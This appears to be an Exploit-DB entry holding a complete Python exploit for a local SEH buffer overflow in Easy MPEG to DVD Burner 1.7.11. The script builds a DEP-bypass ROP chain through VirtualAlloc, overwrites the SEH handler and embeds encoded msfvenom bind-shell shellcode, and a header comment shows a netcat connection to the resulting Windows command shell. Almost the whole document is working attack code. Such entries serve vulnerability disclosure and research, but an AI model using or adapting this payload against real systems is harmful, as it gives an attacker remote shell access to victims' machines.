Easy MPEG to DVD Burner 1.7.11 – Local Buffer Overflow (SEH) (DEP Bypass)

  • 作者: Juan Prescotto
    日期: 2018-05-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44658/
  • #!/usr/bin/python
    
    #------------------------------------------------------------------------------------------------------------------------------------#
    # Exploit: Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass Local Buffer Overflow #
    # Date: 2018-05-19 #
    # Author: Juan Prescotto #
    # Tested Against: Win7 Pro SP1 64 bit#
    # Software Download #1: https://downloads.tomsguide.com/MPEG-Easy-Burner,0301-10418.html #
    # Software Download #2: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe#
    # Version: 1.7.11#
    # Special Thanks to my wife for allowing me to spend countless hours on this passion of mine#
    # Credit: Thanks to Marwan Shamel (https://www.exploit-db.com/exploits/44565/) for his work on the original SEH exploit#
    # Steps : Open the APP > click on register > Username field > paste in contents from the .txt file that was generated by this script #
    #------------------------------------------------------------------------------------------------------------------------------------#
    # Bad Characters: \x00\x0a\x0d#
    # SEH Offset: 1012 #
    # Non-Participating Modules: SkinMagic.dll & Easy MPEG to DVD Burner.exe #
    #------------------------------------------------------------------------------------------------------------------------------------#
    # root@kali:~/Desktop# nc -nv 10.0.1.14 4444 #
    # (UNKNOWN) [10.0.1.14] 4444 (?) open#
    # Microsoft Windows [Version 6.1.7601] #
    # Copyright (c) 2009 Microsoft Corporation. All rights reserved. #
    ##
    # C:\Program Files (x86)\Easy MPEG to DVD Burner>#
    #------------------------------------------------------------------------------------------------------------------------------------#
    
    # My register setup when VirtualAlloc() is called (Defeat DEP) :
    #--------------------------------------------
    # EAX = Points to PUSHAD at time VirtualAlloc() is called (Stack Pivot jumps over it on return)
    # ECX = flProtect (0x40)
    # EDX = flAllocationType (0x1000)
    # EBX = dwSize (0x01)
    # ESP = lpAddress (automatic)
    # EBP = ReturnTo (stack pivot into a rop nop / jmp esp)
    # ESI = ptr to VirtualAlloc()
    # EDI = ROP NOP (RETN)
    
    import struct
    
    def create_rop_chain():
        """Return the DEP-bypass ROP chain packed as little-endian DWORDs.

        The chain is split into the stages named in the original comments.
        Each stage loads one register for the VirtualAlloc() call described
        in the header block (ESI = &VirtualAlloc, ECX = 0x40, EDX = 0x1000,
        EBP = ReturnTo pivot, EBX = 1, EDI = ROP NOP); the last stage before
        the landing pad reaches a PUSHAD # RETN so those registers become the
        call's stack frame, and after the call a RETN sled leads into
        PUSH ESP # RET.

        Every address is absolute and taken from SkinMagic.dll or the main
        executable, which the header lists as "non-participating modules";
        the addresses are hard-coded, so the chain depends on those modules
        mapping at the same base on every run.

        Returns:
            str (Python 2): 58 DWORDs packed with '<I', i.e. 232 bytes.
        """
        # Gadgets that recur across stages (addresses as in the original list).
        filler = 0x41414141         # padding word skipped by a preceding POP or RETN n (per the gadget comments)
        rop_nop = 0x10032158        # RETN (ROP NOP) [SkinMagic.dll]
        pop_ebx = 0x10032993        # POP EBX # RETN [SkinMagic.dll]
        pop_edx = 0x10037bc0        # POP EDX # RETN [SkinMagic.dll]
        pop_eax = 0x10037654        # POP EAX # RETN [SkinMagic.dll]
        inc_ebx = 0x10037bd3        # INC EBX # FPATAN # RETN [SkinMagic.dll]
        add_eax_const = 0x100317c8  # ADD EAX,5EFFC883 # RETN [SkinMagic.dll]
        push_eax = 0x1003248d       # PUSH EAX # RETN [SkinMagic.dll] -- transfers to the address in EAX

        # Stage 1: ESI = &VirtualAlloc()
        virtualalloc_to_esi = [
            0x10027e6b,     # POP EAX # RETN [SkinMagic.dll]
            0x1003b1d4,     # ptr to &VirtualAlloc() [IAT SkinMagic.dll]
            0x100369a1,     # MOV EAX,DWORD PTR DS:[EAX] # RETN [SkinMagic.dll]
            pop_ebx,
            0xffffffff,
            inc_ebx,
            inc_ebx,
            pop_edx,
            0xffffffff,
            0x10035a07,     # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN [SkinMagic.dll]
            pop_eax,
            0xa141dffb,
            add_eax_const,  # -> 0x0041a87e : ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
            push_eax,       # "calls" 0x0041a87e
            filler,
            0x1003993e,     # PUSH EDX # ADD AL,5F # POP ESI # POP EBX # RETN 0x0C [SkinMagic.dll]
        ] + [filler] * 5

        # Stage 2: ECX = flProtect (0x40)
        flprotect_to_ecx = [
            0x100185fb,     # XOR EAX,EAX # RETN [SkinMagic.dll]
        ] + [filler] * 3 + [
            0x10037c5b,     # ADD EAX,40 # POP EBP # RETN [SkinMagic.dll]
            filler,
            0x10032176,     # XCHG EAX,ECX # ADD EAX,20835910 # ADD BYTE PTR DS:[ECX+10059130],AH # MOV DWORD PTR DS:[1005912C],EAX # RETN [SkinMagic.dll]
        ]

        # Stage 3: EDX = flAllocationType (0x1000)
        alloc_type_to_edx = [
            pop_ebx,
            0xaaaaaaaa,
            pop_edx,
            0x55556556,
            pop_eax,
            0xa141dffb,
            add_eax_const,  # -> 0x0041a87e : ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
            push_eax,       # "calls" 0x0041a87e
            filler,
        ]

        # Stage 4: EBP = ReturnTo (stack pivot into the ROP NOP sled / jmp esp)
        return_to_ebp = [
            0x1002829d,     # POP EBP # RETN [SkinMagic.dll]
        ] + [filler] * 4 + [
            0x100284f8,     # {pivot 16 / 0x10} : ADD ESP,0C # POP EBP # RETN [SkinMagic.dll]
        ]

        # Stage 5: EBX = dwSize (0x1)
        size_to_ebx = [pop_ebx, 0xffffffff, inc_ebx, inc_ebx]

        # Stage 6: EDI = ROP NOP
        rop_nop_to_edi = [
            0x100342f0,     # POP EDI # RETN [SkinMagic.dll]
            rop_nop,
        ]

        # Stage 7: reach PUSHAD # RETN (0x00407555 [Easy MPEG to DVD Burner.exe]) -> VirtualAlloc() runs
        pushad_and_call = [
            pop_eax,
            0xa140acd2,     # CONSTANT
            add_eax_const,  # EAX = 0x00407555 : PUSHAD # RETN
            push_eax,       # "calls" 0x00407555
        ]

        # Stage 8: after VirtualAlloc() returns / pivot lands here: RETN sled, then push esp # ret -> shellcode
        landing = [rop_nop] * 4 + [
            0x1001cc57,     # push esp # ret [SkinMagic.dll]
        ]

        chain = (virtualalloc_to_esi + flprotect_to_ecx + alloc_type_to_edx
                 + return_to_ebp + size_to_ebx + rop_nop_to_edi
                 + pushad_and_call + landing)
        pack_dword = struct.Struct('<I').pack
        return ''.join([pack_dword(word) for word in chain])
    
    rop_chain = create_rop_chain()  # packed gadget words; placed after the two pivot/NOP runs when `exploit` is assembled below
    
    # Pivot run: 0x1002ddbd {pivot 12 / 0x0c} : ADD ESP,0C # RETN [SkinMagic.dll], repeated 18 times.
    nop_rop_chain_1 = 18 * "\xbd\xdd\x02\x10"
    # ROP NOP run: 0x10032158 : RETN [SkinMagic.dll], repeated 22 times.
    nop_rop_chain_2 = 22 * "\x58\x21\x03\x10"
    # SEH handler overwrite: 0x00404e06 {stack pivot 1928 / 0x788} (lands in the rop nop chain --> rop_chain) :
    # POP EDI # POP ESI # POP EBP # MOV DWORD PTR FS:[0],ECX # POP EBX # ADD ESP,778 # RETN [Easy MPEG to DVD Burner.exe]
    # Only three bytes are written: the top byte of the address is 0x00, which the header lists as a bad character.
    seh = "\x06\x4e\x40"
    # Classic NOP sled in front of the shellcode.
    nop = 20 * "\x90"
    
    #Max Space Available for Shellcode = 600 bytes
    #------------------------------------------------------------------------------------#
    # msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x0a\x0d' -f py -v shellcode #
    # x86/shikata_ga_nai succeeded with size 355 (iteration=0) #
    #------------------------------------------------------------------------------------#
    # Encoded bind-shell payload pasted verbatim from the msfvenom command above
    # (355 bytes, per the encoder output quoted there). Opaque encoder output;
    # treated as a blob and not interpreted here.
    shellcode =""
    shellcode += "\xb8\x50\x08\x0f\xf2\xd9\xe9\xd9\x74\x24\xf4\x5b"
    shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x93"
    shellcode += "\x0c\xed\x07\xef\xe5\x73\xe7\x0f\xf6\x13\x61\xea"
    shellcode += "\xc7\x13\x15\x7f\x77\xa4\x5d\x2d\x74\x4f\x33\xc5"
    shellcode += "\x0f\x3d\x9c\xea\xb8\x88\xfa\xc5\x39\xa0\x3f\x44"
    shellcode += "\xba\xbb\x13\xa6\x83\x73\x66\xa7\xc4\x6e\x8b\xf5"
    shellcode += "\x9d\xe5\x3e\xe9\xaa\xb0\x82\x82\xe1\x55\x83\x77"
    shellcode += "\xb1\x54\xa2\x26\xc9\x0e\x64\xc9\x1e\x3b\x2d\xd1"
    shellcode += "\x43\x06\xe7\x6a\xb7\xfc\xf6\xba\x89\xfd\x55\x83"
    shellcode += "\x25\x0c\xa7\xc4\x82\xef\xd2\x3c\xf1\x92\xe4\xfb"
    shellcode += "\x8b\x48\x60\x1f\x2b\x1a\xd2\xfb\xcd\xcf\x85\x88"
    shellcode += "\xc2\xa4\xc2\xd6\xc6\x3b\x06\x6d\xf2\xb0\xa9\xa1"
    shellcode += "\x72\x82\x8d\x65\xde\x50\xaf\x3c\xba\x37\xd0\x5e"
    shellcode += "\x65\xe7\x74\x15\x88\xfc\x04\x74\xc5\x31\x25\x86"
    shellcode += "\x15\x5e\x3e\xf5\x27\xc1\x94\x91\x0b\x8a\x32\x66"
    shellcode += "\x6b\xa1\x83\xf8\x92\x4a\xf4\xd1\x50\x1e\xa4\x49"
    shellcode += "\x70\x1f\x2f\x89\x7d\xca\xda\x81\xd8\xa5\xf8\x6c"
    shellcode += "\x9a\x15\xbd\xde\x73\x7c\x32\x01\x63\x7f\x98\x2a"
    shellcode += "\x0c\x82\x23\x45\x91\x0b\xc5\x0f\x39\x5a\x5d\xa7"
    shellcode += "\xfb\xb9\x56\x50\x03\xe8\xce\xf6\x4c\xfa\xc9\xf9"
    shellcode += "\x4c\x28\x7e\x6d\xc7\x3f\xba\x8c\xd8\x15\xea\xd9"
    shellcode += "\x4f\xe3\x7b\xa8\xee\xf4\x51\x5a\x92\x67\x3e\x9a"
    shellcode += "\xdd\x9b\xe9\xcd\x8a\x6a\xe0\x9b\x26\xd4\x5a\xb9"
    shellcode += "\xba\x80\xa5\x79\x61\x71\x2b\x80\xe4\xcd\x0f\x92"
    shellcode += "\x30\xcd\x0b\xc6\xec\x98\xc5\xb0\x4a\x73\xa4\x6a"
    shellcode += "\x05\x28\x6e\xfa\xd0\x02\xb1\x7c\xdd\x4e\x47\x60"
    shellcode += "\x6c\x27\x1e\x9f\x41\xaf\x96\xd8\xbf\x4f\x58\x33"
    shellcode += "\x04\x7f\x13\x19\x2d\xe8\xfa\xc8\x6f\x75\xfd\x27"
    shellcode += "\xb3\x80\x7e\xcd\x4c\x77\x9e\xa4\x49\x33\x18\x55"
    shellcode += "\x20\x2c\xcd\x59\x97\x4d\xc4"
    
    # Layout before the SEH record: pivot run, ROP NOP run, ROP chain, NOP sled,
    # shellcode, then 'A' padding out to the 1012-byte SEH offset from the header,
    # and finally the three handler bytes.
    payload_parts = [nop_rop_chain_1, nop_rop_chain_2, rop_chain, nop, shellcode]
    body = "".join(payload_parts)
    # NOTE: a negative repeat count yields an empty string rather than an error,
    # so nothing here reports a body longer than the offset.
    padding = "\x41" * (1012 - len(body))
    exploit = body + padding + seh

    # Written to the working directory; the header says to paste this file's
    # contents into the register dialog's Username field.
    with open("Exploit.txt", "w") as out_file:
        out_file.write(exploit)